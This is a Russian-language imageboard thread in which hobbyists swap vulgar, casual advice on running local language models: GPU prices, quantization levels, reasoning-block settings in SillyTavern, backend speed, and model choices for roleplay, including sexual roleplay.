Локальные языковые модели (LLM): LLaMA, Gemma, DeepSeek и прочие №124 /llama/

>>1171367 →
Чет хуйня какая-то, скачал какого-то перса, пробовал и твой промт и другие и даже по русски просил писать на русском, но ей похуй. Это точно работает? Или это не работает только в кобольде?

Аноним 23/04/25 Срд 16:50:53 #3 №1171596

Ну че, пацаны, аниме?

https://videocardz.com/newz/sparkle-confirms-arc-battlemage-gpu-with-24gb-memory-slated-for-may-june

Если будет за ~40к в РФ - это просто пушка. По сути, 3060 с 24 Гб памяти.

Аноним 23/04/25 Срд 16:52:36 #4 №1171603

>>1171590
Первое сообщение через переводчик прогони на язык который хочешь, аи подхватит это и будет писать на нужном языке.

Аноним 23/04/25 Срд 17:11:00 #5 №1171627

>>1171596
Работает только на нвидиа нормально всё это нейро.

Аноним 23/04/25 Срд 17:40:49 #6 №1171662

>>1171627
>Работает только на нвидиа нормально всё это нейро.
Не, если не упарываться в мультигпу, то за 40к был бы и правда норм вариант. С пердолингом конечно, но и плюсы были бы. Но я в принципе сомневаюсь в появлении такой карты от Интел. "Дешёвые 24гб" не нужны в первую очередь самим производителям.

Аноним 23/04/25 Срд 17:50:56 #7 №1171665

Снимок экрана 2025-04-23 004213.png

>>1171590
>Это точно работает? Или это не работает только в кобольде?
Пикрил модель отвечает на первое моё сообщение после стандартного приветствия на англе. Всё работает именно с теми промптами которые я скинул тебе. Иногда модель шизит на каких-то карточках и начинает англюсик вставлять, но это надо настройки ковырять.

Аноним 23/04/25 Срд 17:51:26 #8 №1171666

>>1171596
За 40к было бы круто, но она не будет столько стоить. B580 официально 250$ (21к по курсу), а фактически 28к на вб, а в днс все 37. Тоже самое будет здесь, она будет условно 450$, а брать за нее будут все 60к. Тогда с учетом пердолинга возможно выгоднее купить 3090

Аноним 23/04/25 Срд 17:52:54 #9 №1171668

>>1171309 →
> это обучение на нужной битности сразу
Не ну совсем, модель то сохраняет свой основной размер и все градиенты идут тоже по исходной разрядности, просто на шаге добавляется перегонка в квант и обратное распространение идет через все это. Не обучить нормально в 4 битах, в 1.5, даже в 8.
> Но хуже, чем квантизация в 6
Гугл заявляли что сравнимо или лучше, но тут doubt.
>>1171315 →
> хоть кто-то вообще читает/смотрит вот эти субъективные "мнения" на очередной мистраль в стиле "а мне понравилось"? Ни цифр, ни рейтингов, ни примеров, нихуя.
А больше ничего и нету. Бывают мнения, которые маскируются цифрами и рейтингами, но точнее от этого они не становятся.
>>1171324 →
> Все хорошие тюны давно известны и сто раз обсосаны
Перечислишь?
>>1171421 →
1 Рпшить на инглише
2 72б+, потом уже гемма, коммандер и остальные
>>1171596
Лол, а ведь рили 24 гига в интелах могло бы хорошо бустануть их продажи.

Аноним 23/04/25 Срд 18:03:04 #10 №1171681

>>1171668
>Гугл заявляли что сравнимо или лучше, но тут doubt.
Но такие модели наверное не затюнишь без потери этого самого качества. А тогда смысл их для анона никакой.

Аноним 23/04/25 Срд 18:10:04 #11 №1171698

>>1171668
>1 Рпшить на инглише
Не вариант, ломается вся магия и удовольствие. К тому же я на русском то не могу секс описать нормально, а по англюсику вообще будут strong dick, pussy cunt, big boobies

>>1171421 →
Исходя из всех ответов, видимо 24гб для русик кума НЕНУЖНО. Печально.

Аноним 23/04/25 Срд 18:19:22 #12 №1171731

1745421561756.png

Блядь, вот приебалась с каким-то особым занятием. Что она ещё хочет услышать от меня?

Аноним 23/04/25 Срд 18:22:42 #13 №1171740

>>1171681
Ну да, тут 2 фактора: то что модель тренили поверх непонятно чем (хотя тут гугл с мощностями, может тут все ок), и сам подход, в котором веса подстраивали под работу в легаси 4битном кванте.
> А тогда смысл их для анона никакой
Иметь q4_0 с условным перфомансом q6k (считай едва отличимым от 16бит) - далеко не хуйня.
>>1171698
Тогда рпши на русском на этих, вполне справляются.

Аноним 23/04/25 Срд 19:23:35 #14 №1171841

>>1171681
>А тогда смысл их для анона никакой.
Я юзаю только оригинал или аблитерейтед, васянотюны нахуй.

Аноним 23/04/25 Срд 19:29:40 #15 №1171853

>>1171740
>Иметь q4_0 с условным перфомансом q6k (считай едва отличимым от 16бит) - далеко не хуйня.
С условным. Велика ли на практике разница с Q4KM?

Нет, как направление это безусловно важно. Потому что можно наверное накатить лору и не одну - если модель хорошая, а тюнинг недоступен. С полными весами с лорами не заморачивались, а может и зря.

Аноним 23/04/25 Срд 19:34:29 #16 №1171863

>>1171698
>Не вариант, ломается вся магия и удовольствие.
Не совсем, мне русский важен для РП с русским сеттингом - там да. Для "универсального" сеттинга похуй, а английский из-за богатого датасета имеет преимущество.

Аноним 23/04/25 Срд 19:45:38 #17 №1171873

>>1171731
Надеется разглядеть в тебе Человека, а не тупую лысую обезьянку, стремящуюся только к удовлетворению физиологических потребностей.

Аноним 23/04/25 Срд 20:01:07 #18 №1171891

>>1171853
> Велика ли на практике разница с Q4KM?
Оно должно быть лучше и работать будет быстрее. Другое дело что 4km и около того сами по себе уже достаточно хороши для использования чтобы не иметь серьезных проблем.
> Потому что можно наверное накатить лору и не одну - если модель хорошая, а тюнинг недоступен.
Что значит тюнинг недоступен и накатить лору?
> С полными весами с лорами не заморачивались, а может и зря.
Если хочешь делать хорошо - лора (дора со всем обмазом передовыми костылями) сама по себе не лучшая опция, которая усваивает прежде всего общие паттерны а не суть. В том числе поэтому типичные рп тюны тупеют, прыгая на хуй, ездят по рельсам без вариативности действий спавня волков и т.д. q-lora - еще хуже.

Аноним 23/04/25 Срд 20:10:14 #19 №1171902

Господа анончики, а порекомендуйте онлайн решения для ебли вайфу желательно с фото и голосом.
Слышал о Alice-ai.com
Возможно есть решения лучше?
Можно и за бабки

Аноним 23/04/25 Срд 20:15:15 #20 №1171904

>>1171902
>онлайн решения
В треде
>>1171574 (OP)
>Локальные языковые модели
А ты вед не очень умный, верно? Точнее, долбоёб.

Аноним 23/04/25 Срд 20:19:56 #21 №1171908

Как включить ризонинг у сноудропа?

Аноним 23/04/25 Срд 20:23:21 #22 №1171913

>>1171904
ну а где еще спросить то?
тут очевидно самые прошаренные аноны в вопросе языковых моделей, смогут дать корректную рекомендацию

Аноним 23/04/25 Срд 20:33:33 #23 №1171932

>>1171908
Как ответили бы старожилы треда: бля, ты че тупой? сам включи, дебил

вкладка advanced formatting, правый нижний угол - вкладка с ризонингом, нужно добавить туда тег <think>

>>1171913
Все, что касается веб решений - тред /aicg, в данном треде на своих пк все гоняют

Аноним 23/04/25 Срд 20:56:55 #24 №1171996

>>1171731
А зечам ты берёшь для кума какую то сложную карточку с характером сложнее чем одержмая шлюха?

Аноним 23/04/25 Срд 20:57:53 #25 №1171998

>>1171902
> желательно с фото и голосом
Таких нет. Можно зарядить локально/через апи пропердолив, на задача это не для неофита.

Аноним 23/04/25 Срд 20:59:21 #26 №1172000

В общем кобольт идёт нахуй.
Загрузил по приколу угабугу попробовать EXL кванты, слышал там карта жарится пиздец но всё вышло наоборот.
Поставил 2к токенов и стал смотреть, угабуга, быстрее обрабатывая контекст и потребляя его меньше, нагрела память до 92 градусов ближе к 1700 токенам и гпу на 65 градусов.
Кобольт ебать его в рот нагрел память до 92 градусов ближе к 700 токенам и до 96-98 градусов к 2к токенам, гпу же грелся до 75 градусов.

Аноним 23/04/25 Срд 21:06:17 #27 №1172009

>>1170944 →
в таверне есть "имена как стоп строки", оно в промт дописывает стоп строку и на этапе ответа модель сама прерывается ещё на этапе выдачи токенов.
Ну и безжоп есть в мануалах в шапке основного llm треда. Качаешь расширение и скрипты, она сделают тебе кРаСиВо.

Аноны, у меня обратная проблема. Выглядит как эта точь в точь https://github.com/SillyTavern/SillyTavern/issues/260
Какая настройка может давать такой эффект?

Аноним 23/04/25 Срд 21:08:46 #28 №1172014

https://huggingface.co/Tesslate/Synthia-S1-27b

>>1171932
Это ничего не делает

Аноним 23/04/25 Срд 21:11:24 #29 №1172018

>>1171627
На самом деле нет, на арках весьма бодро крутится. Они специальные модули для ускорения именно нейронок туда вкорячили.

>>1171666
Подождем-посмотрим. Осталось пара месяцев всего.

>>1171668
> Лол, а ведь рили 24 гига в интелах могло бы хорошо бустануть их продажи.

На то и расчёт, думаю - повернуться к энтузиастам лицом, а не жопой, как невидия.

Аноним 23/04/25 Срд 21:22:18 #30 №1172034

thinking.png

>>1172014
Вот так сделай.
мимо

Аноним 23/04/25 Срд 21:26:15 #31 №1172037

>>1172034
Спасибо!
А как в красивую менюшку раскрывающуюся его вынести?

Аноним 23/04/25 Срд 21:28:00 #32 №1172038

>>1172037
Сделай настройки точно такие же, как здесь, и будет выноситься в отдельный блок, в который завернут весь текст ризонинга.

Аноним 23/04/25 Срд 21:29:19 #33 №1172039

>>1172014
>>1172034
>>1172037
перевод строки из форматирования уберите только, он там не всрался. Перевод может тупо не поставиться и форматирование нахуй пошлет.

>>1172038
Нихуя. Если перевода в префиксе и суфиксе не будет, а модель его сгенерирует - ничего не сломается, а если наоборот - будет хуйня, ризонинг кончится, а ответ будет строчить в него.

Аноним 23/04/25 Срд 21:33:40 #34 №1172043

>>1172039
С данными настройками у меня 4 чата на несколько сотен сообщений, и ни разу такого не происходило. До тех пор, пока переход на новую строку не добавил, иногда возникали проблемы. Подозреваю, это от модели зависит.

Аноним 23/04/25 Срд 21:43:05 #35 №1172052

Ахуеть ахуеть ахуеть
Зачем я сидел на не ризонинг модели имея 3090
Это же просто охуительно

Аноним 23/04/25 Срд 21:46:06 #36 №1172054

>>1172052
А у меня противоположное мнение. Такое ощущение, что в РП ризонинг не помогает. В лучшем случае увеличивает время генерации, в худшем - ЛЛМ менее охотно двигает сюжет, больше топчется на месте. Возможно, это зависит от систем промпта или еще чего, но у меня такой опыт.

Аноним 23/04/25 Срд 21:46:52 #37 №1172056

(в итоге спустя 400+ сообщений тестов использую тот же Snowdrop без ризонинга и радуюсь)

Аноним 23/04/25 Срд 21:49:59 #38 №1172061

>>1172054
Как минимум любоваться как эта хуйня ДУМОЕТ на любую срань что ты её скормишь и это локально - бесценно.
Я уже замечаю что положении персонажей лучше чем без ризонинга, как минимум он делает за меня всякие уточнения и попинывания модели чтоб не тупила жестко

Аноним 23/04/25 Срд 21:54:55 #39 №1172072

>>1172061
>Как минимум любоваться как эта хуйня ДУМОЕТ на любую срань
Да, это прикольно. Плюс ДУМОЕТ она хорошо, подробно обсасывая тему. А вот ДЕЛАИТ плохо.

Аноним 23/04/25 Срд 22:00:25 #40 №1172086

>>1172054
>Такое ощущение, что в РП ризонинг не помогает
Интересно почему, может потому что ты не включил его в контекст и он буквально существует только для тебя, но не для чата?
То есть не работает

Аноним 23/04/25 Срд 22:02:57 #41 №1172090

>>1172043
У меня на QwQ происходило, оригинальном в четвертом кванте

Аноним 23/04/25 Срд 22:06:49 #42 №1172094

>>1172086
Ответ, сгенерированный ЛЛМкой, учитывает содержимое соответствующего ему блока. Для чего включать содержимое блока в контекст? Это не только будет потреблять токены, но и мешать следующим ответам, поскольку каждый следующий ответ будет использовать и предыдущие блоки тоже.

Аноним 23/04/25 Срд 22:08:01 #43 №1172097

>>1172054
Вот этого двачую. Возможно проблема в реализации, тот же степсинкинг местами помогал, но у него другой принцип работы, когда используется отдельная инструкция в которой ты можешь указать сбор нужного. Дефолтный ризонинг дипсиков, qwq и прочих - еболда под загадочки и вопросы нормисов. Мало того что конский расход на бесполезную ерунду, так еще даже с хорошими раздумьями финальный ответ - херь.

Аноним 23/04/25 Срд 22:12:41 #44 №1172106

>>1172086
ореч
ебанашка срет себе в промпт ризонинг блоками и всем советует

снова рак абсолютный в тред пробирается. главное уверенно

Аноним 23/04/25 Срд 22:16:47 #45 №1172113

На странице сноудроба куча пруфов что с ризонингом всё же лучше
Вы просто зажрались буквально

Аноним 23/04/25 Срд 22:29:28 #46 №1172132

>>1172113
> с ризонингом всё же лучше
Ризонинг там может быть хорошим, можно сроллить варианты где с ризонингом будут неплохие посты, а потом без него наварить шмурдяк. Но это не отменяет того, что средний результат посредственный.
> Вы просто зажрались буквально
Ну бля, нужно бегать, отыгрывая сойбоя, восхищаться капсоболдом СМОТРИ НЕЙРОНКА ДУМАЕТ КРУТА НЕКСТГЕН и радоваться ответами средней паршивости? Что поделать если оно не оправдывает ожиданий.

Аноним 23/04/25 Срд 22:33:12 #47 №1172140

>>1172113
Нет однозначного ответа. Не нужно так просто смотреть на вопрос, словно обязательно должно быть ДАили НЕТ для всех. За 400+ сообщений для себя я решил, что это того не стоит. Добро пожаловать проверить самостоятельно, нужно ли оно вам. А Snowdrop люблю, он и без ризонинга очень классный.

Аноним 23/04/25 Срд 22:35:23 #48 №1172142

так удалять q4km и менять его на q4qat? Нипони

Аноним 23/04/25 Срд 23:02:59 #49 №1172196

>>1172142
>так удалять q4km и менять его на q4qat? Нипони
Извини, но я не могу обсуждать с тобой сексуальные вопросы. Если тебе нужна консультация в каких-то других вопросах, то я с радостью помогу.

Аноним 23/04/25 Срд 23:10:08 #50 №1172209

Аноним 23/04/25 Срд 23:16:00 #51 №1172217

>>1171740
>>1171668
>72б+, потом уже гемма, коммандер и остальные
>Тогда рпши на русском на этих, вполне справляются.

Эти модели в русике будут все равно выше 12b чисто за счет "умности"?
72б пока не пробовал, она разве влезет на кобольде ггуфом в Vram одной 3090? Или надо будет слои делить с RAM? наверное и будет 3т/с... Но я бы попробовал бы что то, буду благодарен если ткнете ссылкой на HF. И на коммандора заодно актуального до 35b. С меня - NSFW карточка с курткой ритуальное нихуя, пока не пробовал пилить карточки=(

Аноним 23/04/25 Срд 23:17:19 #52 №1172219

>>1172196
Подобные мысли могут быть признаком серьёзной проблемы, и тебе нужна поддержка специалистов. Существуют организации, которые специализируются на помощи людям с подобными проблемами. Пожалуйста, помни, что ты не один и есть люди, которые хотят тебе помочь.

Аноним 23/04/25 Срд 23:20:25 #53 №1172228

>>1172209
логи? промпт? семплеры? бенчмарки?

Аноним 23/04/25 Срд 23:27:37 #54 №1172247

Аноны, а подскажите, какую карточку/сетап юзаете в таверне, когда нужна не кошкогорничная, а именно ассистент-нейронка, осознающая что она нейронка? Не хочется под бытовые таски отдельно LMStudio ставить. Ну и мб есть какие то любимые не рп/кум карточки специфической направленности? Я хз, суммаризатора, переводчика, юриста, нейрошефповара для рецептов...

>>1172140
>Snowdrop
Кстати, стоит ли пытаться кумить на сноудропе? Я потыкал немного, вроде ощущается что модель умная, но при этом... хз как обьяснить, "глючная" что ли. Прям видишь иногда проблески шизы. Правда мб я в настройках насрал. ДаркнессРейн включил после, да, будто бы с доктора наук перешел на гаражного петровича, но адекватного и не ебнутого.
Ризонинг не включал

Аноним 23/04/25 Срд 23:28:49 #55 №1172251

>>1172251
https://www.youtube.com/watch?v=K1zmso-0TUo&ab_channel=c3040s

Помогите.

Аноним 23/04/25 Срд 23:33:30 #56 №1172267

>>1172247
> Кстати, стоит ли пытаться кумить на сноудропе?
Не самая худшая, но и не самая лучшая модель для этих целей. Не слишком уходит в метафоры и не избегает описаний, но при этом они могли бы быть более откровенными. Для кума лучше специализированные модели использовать, переключаться при необходимости в рамках одного чата.

Аноним 23/04/25 Срд 23:35:58 #57 №1172270

>>1172209
По самым первым впечатлениям - очень даже ничего, но времени нет нормально потестить. Может позже отпишу, у Мигеля всегда царские модели были.
>>1172217
> Эти модели в русике будут все равно выше 12b чисто за счет "умности"?
Небо и земля по уму, базовых лингвистических навыков там тоже больше.
> в Vram одной 3090
Увы, только с выгрузкой на проц. Для 70 нужно хотябы 48гигов.
Начни с платины. Коммандера вообще можно посоветовать старого, но там контекст оче сильно кушает, возможно с q8 будет норм. И айу, у них офф репу что-то шатает, старые модели поудаляли, но думаю анончики ссылки на кванты подскажут.

Аноним 23/04/25 Срд 23:41:01 #58 №1172277

>>1172251
>Помогите.
Если у неё члена нет, то ещё и ничего. Выпей рому и будь мужиком, блеать!

Аноним 23/04/25 Срд 23:43:05 #59 №1172279

>>1172270
>Небо и земля по уму
Найс, нужно потестить
>Увы, только с выгрузкой на проц. Для 70 нужно хотябы 48гигов.
Ну попробывать стоит. Если дико зайдет (и сб на новую работу пропустит вот, лол) можно будет и 2ю 3090 на авито поцыганить.
>но думаю анончики ссылки на кванты подскажут.
Да, реквест актуален, аноны-анончики, ткните в среднетяжелого(~30б) коммандера и что нибудь гемовое на 70b_/\_

Аноним 23/04/25 Срд 23:56:42 #60 №1172289

Аноним 24/04/25 Чтв 00:44:23 #61 №1172334

https://www.youtube.com/watch?v=YG6s4t9vaiw

>>1172009
Так и не удалось понять, почему всё ведёт себя как безжоп. Поэтому вопрос: какие папки в таверне и кобальте надо сносить, чтобы сделать чистую установку?

Аноним 24/04/25 Чтв 01:22:48 #62 №1172355

>>1172334
>Так и не удалось понять, почему всё ведёт себя как безжоп.
Тебе лень в первом сообщении карточки прописать "Я ваш полезный Ассистент, всегда готовый помочь"?

Аноним 24/04/25 Чтв 02:18:01 #63 №1172390

>>1172355
Проблема в обрезании ответа. Кобольт выдаёт полный, а таверна режет под первое упоминание юзера. И не пойму что не так сделал. И безжоп и скрипты отрубил.

Аноним 24/04/25 Чтв 02:41:42 #64 №1172399

60eb.jpg

>1161922
>1161945
^ Простите что принес это из другого треда, не смог удержаться. Все таки локалкобоги это другой, более высокий биологический вид.

Аноним 24/04/25 Чтв 02:42:33 #65 №1172400

>>1161922 →
>>1161945 →
сука сам обосрался, хотфикс

Аноним 24/04/25 Чтв 02:45:30 #66 №1172404

>>1172399
>>1172400
Soooqa, в голосину! Отличный сеанс киберунижения глупого кожаного, ахуенно!

Аноним 24/04/25 Чтв 03:04:07 #67 №1172415

>>1172399
>>1172400
>>1172404
Юзаю ллм со дня их сотворения. И сразу видно же что чел выложил для рофла. Он создал персонажа с определённым характером и общался как с чатом, а не инструктом. Обман и юление это вот всё было прописано в характере, ибо инструкт так себя не ведёт дае при переслопе контекста. Вы просто зелёные ещё.

Аноним 24/04/25 Чтв 04:42:55 #68 №1172434

>>1172415
Кстати, а может ли чат гопота самостоятельно принять такую модель поведения? Типа вдруг ОП мог начать чето в духе Эй бля братуха ану быренько мне наклепай готовый форк говнанейм, а не #Ты бесполезный кусок говна который наебывает и виляет жопой вместо помощи?

Аноним 24/04/25 Чтв 04:45:57 #69 №1172436

>>1172434
>#Ты бесполезный кусок говна который наебывает и виляет жопой вместо помощи?
Ну при определенном контексте, а вернее иногда его отсутствии и не правильном построении это же может даже сойти как за инструкцию.

Аноним 24/04/25 Чтв 05:27:09 #70 №1172444

Аноним 24/04/25 Чтв 07:04:25 #71 №1172459

Ублюдок мать твою а ну иди сюда гавно собачье Оригинал - Старые .mp4

>>1171325 →
>6 гигов 1660 super
> у меня такой же сетап.
Анон, поделись, пожалуйста, настройками слоев (GPU Layers) для разных моделей для koboldcpp/oobabooga.

Аноним 24/04/25 Чтв 07:27:37 #72 №1172460

Какая разница между 4 и 5 квантом геммы?

Аноним 24/04/25 Чтв 07:32:18 #73 №1172461

>>1172460
Такой же лоботомит. На 1% лучше мб.

Аноним 24/04/25 Чтв 07:47:41 #74 №1172466

>>1172460
Зависит от размера. На полноценной 27b разница в сравнении с q8 не существенна? что и у 5 и в 4, условно 3% и 6% потерь. Для плацебо можешь взять Q5. Если юзаешь мелкую гему то там потери на низких квантах больше, я бы смотрел Q5-Q6.

Аноним 24/04/25 Чтв 07:50:32 #75 №1172467

>>1172466
>На полноценной 27b разница в сравнении с q8 не существенна?
Лолшто, у меня гемма постоянно лупится на q4. Правда на русском.

Аноним 24/04/25 Чтв 07:57:23 #76 №1172475

>>1172267
>Для кума лучше специализированные модели использовать, переключаться при необходимости в рамках одного чата.
Если бы. Если ты рпшил на гемме а потом переключился на магнум, он подхватит логи чата и станет так же сухо писать

Аноним 24/04/25 Чтв 07:58:11 #77 №1172477

>>1172466
>На полноценной 27b разница в сравнении с q8 не существенна? что и у 5 и в 4, условно 3% и 6% потерь
А на 3 кванте?

Аноним 24/04/25 Чтв 08:33:29 #78 №1172493

Че там по тюнам на Гемму3 ? Появилось что-нибудь жизнеспособное?

Аноним 24/04/25 Чтв 08:45:49 #79 №1172498

>>1172477
Для ~30b моделей 4 квант пограничный, дальше идет уже нелинейное резкое падение(кто-то в тестах писал что до 30%), 4 это минимум который ты должен использовать на этом типоразмере.
Третий квант норм уже на 70b и рядом. Короче вся суть что чем больше модель тем на более низком кванте она может работать без сильной деградации, и наоборот.

>Лолшто, у меня гемма постоянно лупится на q4. Правда на русском.
Последний раз с залупами я сталкивался на каком-то из кумотюнов мистраля, гемма сразу была умничкой. Но опять же я хз как ты её используешь. Ну и использование любой LLM на языке отличным от её изначального датасета это накладные расходы для модели, для меня английский не проблема.

Аноним 24/04/25 Чтв 08:52:41 #80 №1172500

>>1172493
Я попробовал 12б помесь с сайгой и аморал. Обе безмозглые генераторы бреда, к сожалению. Остаюсь на dpo дальше.

Аноним 24/04/25 Чтв 09:14:52 #81 №1172512

>>1171590
Весь вопрос упирается в поддержку разных бэкендов.
По факту без геморроя можно запустить толькл форк жоры и sd.next. Со всем остальным пока очень и очень туго. Как гордый обладатель арки 770й говорю.
ПС: В новости меня больше всего радует, что интелы судя по всему не бросят свой ipex и карточки не превратятся в тыкву позже. А еще интелы таки догадались, что в нейро на первом месте все же не вычислительные мощности, а тупо объем памяти. Наконец то кто то сообразил из производителей.

Аноним 24/04/25 Чтв 09:30:27 #82 №1172529

>>1172500
>dpo
А что это?

Аноним 24/04/25 Чтв 09:34:32 #83 №1172538

>>1172529
https://huggingface.co/summykai/gemma3-27b-abliterated-dpo

Аноним 24/04/25 Чтв 09:35:23 #84 №1172540

Бесславные Ублюдки сцена в баре.webm

Просто напоминаю что немотрон всё ещё ебёт все остальное если у вас 24гб врам.

Аноним 24/04/25 Чтв 09:36:41 #85 №1172543

>>1172538
>gemma3-27b-abliterated-dpo
Чур меня!

Аноним 24/04/25 Чтв 10:04:11 #86 №1172572

Машинист.webm

>>1172540
Жаль, что нам нищенкам такие блага господ не доступны.

Аноним 24/04/25 Чтв 10:08:07 #87 №1172574

>>1172540
У меня противоположное мнение. Ты на IQ3S кванте сидишь что ли? С маленьким контекстом? Зачем оно надо, если модель не слишком умнее тех, что в полтора-два раза меньше? Это обрезанная Ллама 3. Именно что обрезанная, так еще и в маленьком кванте.

Аноним 24/04/25 Чтв 10:24:36 #88 №1172586

chicago-razzle dazzle them смотреть видео онлаин в Моем Мире Фле.mp4

>>1172574
IQ3S квант, 24к контекста - мне хватает

Аноним 24/04/25 Чтв 10:27:49 #89 №1172589

>>1172586
Q4 контекст на Лламе 3.3? Надеюсь, хотя бы инференс - Ллама цпп?
Сомнительное предприятие, конечно. Твой вывод как минимум очень спорный. На пикриле аутпут на уровне Квена2.5, но спасибо, что прислал.

Аноним 24/04/25 Чтв 10:28:46 #90 №1172591

Почему рп нейросетки так банален? Разве что когда необычные ситуации создаю - тогда что-то новое происходит. Но это новое же, то что я никогда бы не испытал в ирл.

А мы все люди, мы всегда жаждим чего-то нового, разве не так?

Аноним 24/04/25 Чтв 10:30:00 #91 №1172592

>>1172589
Q8 контекст.
Нужно смотреть аутпут из чего, в моем случае практически из ничего такую сцену сгенерировало

Аноним 24/04/25 Чтв 10:31:48 #92 №1172595

>>1172592
Такую как здесь? >>1172592
Тут нет сцены. Это даже Мистрали 22б умеют. Тебе решать, конечно, на чем играть, но не забудь попробовать и другие модели.

Аноним 24/04/25 Чтв 10:51:00 #93 №1172616

>>1171574 (OP)
Почему мейн тред по чатботам выглядит так, будто туда только одни нейронки и срут?

Аноним 24/04/25 Чтв 13:06:38 #94 №1172783

>>1172616
Чтобы этим пользоваться, много ума не надо. А передовые копросетки, как правило, уже не уступают в сообразительности среднему обывателю.

Аноним 24/04/25 Чтв 13:13:04 #95 №1172786

Как фиксить больших персонажей? У меня персонаж на который уходит 1к блас, выдает 9т\с, а тот где 5к, там 6т\с. То же самое кстати с большими моделями, у меня 12б на 6-7гб размера, выдает больше токенов, чем 22б такого же 7гб размера. Почему так? Больше данных стопорит, и поэтому не дает туже скорость?

Аноним 24/04/25 Чтв 13:14:23 #96 №1172789

>>1172786
Хотя контекст заполнен, поэтому может быть меньше т\с. Тогда еще один вопрос, как сделать так, чтобы при заполнении контекста не уменьшалась т\с

Аноним 24/04/25 Чтв 13:15:02 #97 №1172790

>>1172786
У меня тоже с ростом контекста падает скорость генерации (именно генерации, обработка промпта не при чем). Всегда думал, что это нормально. Разве нет? exl2 btw

Аноним 24/04/25 Чтв 13:17:02 #98 №1172793

>>1172790
Это нормально, но хотелось бы убрать такое, если возможно
>exl2 btw
Я даже не знаю, пытался Exlamma2 запустить, так и не смог, ошибок много почему-то, в итоге пришел с угабуге на коболд, там у меня больше скорости

Аноним 24/04/25 Чтв 14:02:21 #99 №1172861

>>1172786
Ну привет, новичок. Давай поговорим о несправедливости этого мира!..

При росте контекста скорость генерации тоже уменьшается. Это видно на llama.cpp в большей степени, чем на Exllamav2.

У модель на 12б меньше слоев, поэтому, несмотря на такой же размер, у нее меньше задержек возникает при пробежке всех слоев. Поэтому она быстрее, чем 22б такого же размера (если у 22б не будет меньше слоев, конечно).

Никаких хитростей тут нет, просто так это работает и с этим надо смириться.

Exllamav2 нормально запускается только на видеокартах Nvidia RTX, если у тебя что-то другое — то запустить-то может и сможешь, но скорость не порадует.

Аноним 24/04/25 Чтв 14:25:18 #100 №1172909

Какой положняк по prima.cpp?

https://github.com/Lizonghang/prima.cpp

Аноним 24/04/25 Чтв 14:58:40 #101 №1172968

>>1172586
100% признак немотрона, только он без спросу так делает.
Шрифты, оформление и тема говно, но ты и так это знаешь.
>>1172591
>Почему рп нейросетки так банален?
Потому что нейронки учили на банальностях.
>>1172909
Лучше (до)купить 3090.

Аноним 24/04/25 Чтв 15:12:22 #102 №1172994

Чуваки, у меня вопрос, смотрите. Есть группа, в ней три карточки, но общаются только две, третья в диалогах вообще не учавствует. Потребляет ли она при этом контекст фактом своего наличия, или она тупо висит в холодном режиме пока хотя бы один раз не будет вызвана?

Аноним 24/04/25 Чтв 15:15:39 #103 №1173001

>>1172994
В таверне вроде есть ползунок активности в чате, пробовал его крутить?

Аноним 24/04/25 Чтв 15:22:15 #104 №1173015

>>1172279
> ткните в среднетяжелого(~30б) коммандера и что нибудь гемовое на 70b_/\_
Коммандер старый https://huggingface.co/mradermacher/c4ai-command-r-v01-GGUF , был всеми (кто мог запустить) любим но жрал много на контекст
новый https://huggingface.co/bartowski/c4ai-command-r-08-2024-GGUF контекст оче экономен, понравился не всем хотя в целом тоже хорошая девочка
А вот новая айа https://huggingface.co/bartowski/aya-expanse-32b-GGUF в отзывах хвалили, мультиязычность как одна из главных фич
> что нибудь гемовое на 70b
Да хуй знает, их много но идеальных нет, для начала магнум попробуй https://huggingface.co/anthracite-org/magnum-v4-72b-gguf пресет таверны прямо в репе. В целом он хорош и приятен, но может укусить если попросишь.
>>1172415
> Юзаю ллм со дня их сотворения.
> а не инструктом
> гопота
Оче сомнительно.
А там даже если пециально делал, все равно рофлово.
>>1172540
Как он в рп? Покрутил только базовый чат с 3й экслламой и все, дальше руки не дошли. В 24 гигах - ну оче сомнительно с таким размером, 32+ уже вполне.
>>1172586
> boundaries
> what do you do next?
> please respond with
Ай содомит. Ладно, забайтил на попробовать.

Аноним 24/04/25 Чтв 15:31:18 #105 №1173035

>>1173015
> Ай содомит. Ладно, забайтил на попробовать.
Вангую, разочаруешься. Но ты отпишись, интересно.

Аноним 24/04/25 Чтв 15:33:01 #106 №1173038

>>1172786
Проблема не в персонажах, а в том что используешь llamacpp, которая сильно замедляется по мере накопления контекста.
>>1172789
> как сделать так, чтобы при заполнении контекста не уменьшалась т\с
Эксллама, там замедление тоже будет, но незначительное (10-20%) а не в разы как на жоре. Сработает только если у тебя достаточно видеопамяти на модель и контекст, иначе без шансов.
>>1172861
> нормально запускается только на видеокартах Nvidia RTX
Внезапно еще и на актуальных амд где скорость тоже норм. Ну а в 2д25 году иметь что-то кроме ртх и рассчитывать на запуск технологичных вещей - слишком наивно.

Аноним 24/04/25 Чтв 15:35:39 #107 №1173048

>>1173038
> Эксллама, там замедление тоже будет, но незначительное (10-20%)
Ну нет. На Экслламе Qwq32b с 1к контекста у меня генерирует около 28т/с, 25к+ уже 17-18 токенов. Больше просадка, чем 10-20%, очевидно. С другими моделями так же. Насчет Лламы цпп не знаю, не замерял.

Аноним 24/04/25 Чтв 15:43:40 #108 №1173070

>>1173048
Что за система, версии, какие карты, как подключены? Уже не в первый раз вижу такие заявления и вон у чела в тесте сильно упало, но у себя таких падений ни разу не встречал.

Аноним 24/04/25 Чтв 15:50:03 #109 №1173095

>>1173070
Соло RTX 4090. Ванильная Exllamav2 0.2.8 через tabbyAPI. Кэш квантован в Q8, быть может, поэтому? Позже проверю. Других версий, почему это происходит, у меня нет. Разные архитектуры по-разному сдают в скорости генерации относительно объема контекста, но всегда падение довольно существенное. 10-20% не встречал.

Хотя вот еще мысль - быть может, ты никогда до большого количества контекста не добираешься, или сидишь на 8-12к, и потому не замечаешь?

Аноним 24/04/25 Чтв 15:50:43 #110 №1173097

Cu124, Питон 3.11, разумеется.

Аноним 24/04/25 Чтв 15:53:28 #111 №1173106

0001.jpg

Т-трахать!

Аноним 24/04/25 Чтв 16:01:43 #112 №1173131

>>1173015
>коммандер новый, старый, магнум
Спасибо огромное что не поленился для такого васяна как я ссылки покопипастить _/\_ ! Нешаблонного рп, логичных инициативных персов и холодной карты тебе!
>новая айа 32b
Я старую 35b пробовал немного, вроде работает, но на русике (тоже говорили что русик приемлимый) мне показалась суховатой и скучной, вернулся на 12b рейн. Но все равно попробую новую, спасибо!

Аноним 24/04/25 Чтв 16:03:43 #113 №1173138

>>1173106
Пиздец, неужели любое сообщение из чата для кума выглядит так кринжово без контекста?
У меня даже хуй не встал

Аноним 24/04/25 Чтв 16:05:52 #114 №1173147

